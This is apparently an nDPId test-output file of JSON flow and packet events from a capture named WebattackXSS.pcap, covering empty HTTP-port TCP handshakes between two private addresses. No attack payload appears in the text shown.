-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347556523,"flow_last_seen":1499347561767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58454,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347557789,"flow_last_seen":1499347563767,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347559043,"flow_last_seen":1499347564768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347560327,"flow_last_seen":1499347565768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347561622,"flow_last_seen":1499347566770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347564211,"flow_last_seen":1499347569770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347688806,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347689613,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347689613,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":1,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80NlAAD4G9PasEAABwKgKMunoAFDCAng2AAAAAKACchCQZwAAAgQFtAQCCAoBO6jvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6045,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":2,"flow_last_seen":1499347689613,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347689613,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6egCgzyzwgJ4N6AScSDTxgAAAgQFtAQCCAoD5XpkATuo7wEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6046,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":427,"flow_packet_id":3,"flow_last_seen":1499347689614,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347689614,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00NpAAD4G9P2sEAABwKgKMunoAFDCAng3AoM8tIAQAOVyzQAAAQEICgE7qPAD5Xpk"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347692128,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347692128,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6061,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":1,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u5xAAD4GCjSsEAABwKgKMuoCAFDepxD4AAAAAKACchDYcQAAAgQFtAQCCAoBO6tkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":2,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347692128,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6gK6r2Hi3qcQ+aAScSA8AAAAAgQFtAQCCAoD5XzZATurZAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":428,"flow_packet_id":3,"flow_last_seen":1499347692128,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347692128,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u51AAD4GCjusEAABwKgKMuoCAFDepxD5uq9h44AQAOXbBwAAAQEICgE7q2QD5XzZ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347693386,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347693386,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6073,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":1,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yJFAAD4G\/T6sEAABwKgKMuoQAFBhE2QOAAAAAKACchABpwAAAgQFtAQCCAoBO6yfAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":2,"flow_last_seen":1499347693386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347693386,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6hDs1hgmYRNkD6AScSB7jwAAAgQFtAQCCAoD5X4UATusnwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":429,"flow_packet_id":3,"flow_last_seen":1499347693387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347693387,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yJJAAD4G\/UWsEAABwKgKMuoQAFBhE2QP7NYYJ4AQAOUalwAAAQEICgE7rJ8D5X4U"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347694661,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347694661,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59934,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6085,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":1,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8mmhAAD4GK2isEAABwKgKMuoeAFATaje1AAAAAKACchB6XQAAAgQFtAQCCAoBO63dAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6086,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":2,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347694661,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6h4IeSXoE2o3tqAScSDJowAAAgQFtAQCCAoD5X9SATut3QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6087,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":430,"flow_packet_id":3,"flow_last_seen":1499347694661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347694661,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0mmlAAD4GK2+sEAABwKgKMuoeAFATaje2CHkl6YAQAOVoqgAAAQEICgE7rd4D5X9S"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347697189,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347697189,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":1,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88ppAAD4G0zWsEAABwKgKMuo4AFBV\/kLMAAAAAKACchAqHwAAAgQFtAQCCAoBO7BWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6104,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":2,"flow_last_seen":1499347697189,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347697189,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6jj3l3auVf5CzaAScSA3CAAAAgQFtAQCCAoD5YHKATuwVgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6105,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":431,"flow_packet_id":3,"flow_last_seen":1499347697190,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347697190,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08ptAAD4G0zysEAABwKgKMuo4AFBV\/kLN95d2r4AQAOXWDwAAAQEICgE7sFYD5YHK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347698449,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698449,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":1,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iq9AAD4GOyGsEAABwKgKMupGAFDXwDs\/AAAAAKACchCuoQAAAgQFtAQCCAoBO7GQAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6116,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":2,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347698449,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6kYJky3T18A7QKAScSDxLwAAAgQFtAQCCAoD5YMFATuxkAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6117,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":432,"flow_packet_id":3,"flow_last_seen":1499347698449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347698449,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0irBAAD4GOyisEAABwKgKMupGAFDXwDtACZMt1IAQAOWQNgAAAQEICgE7sZED5YMF"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347698807,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 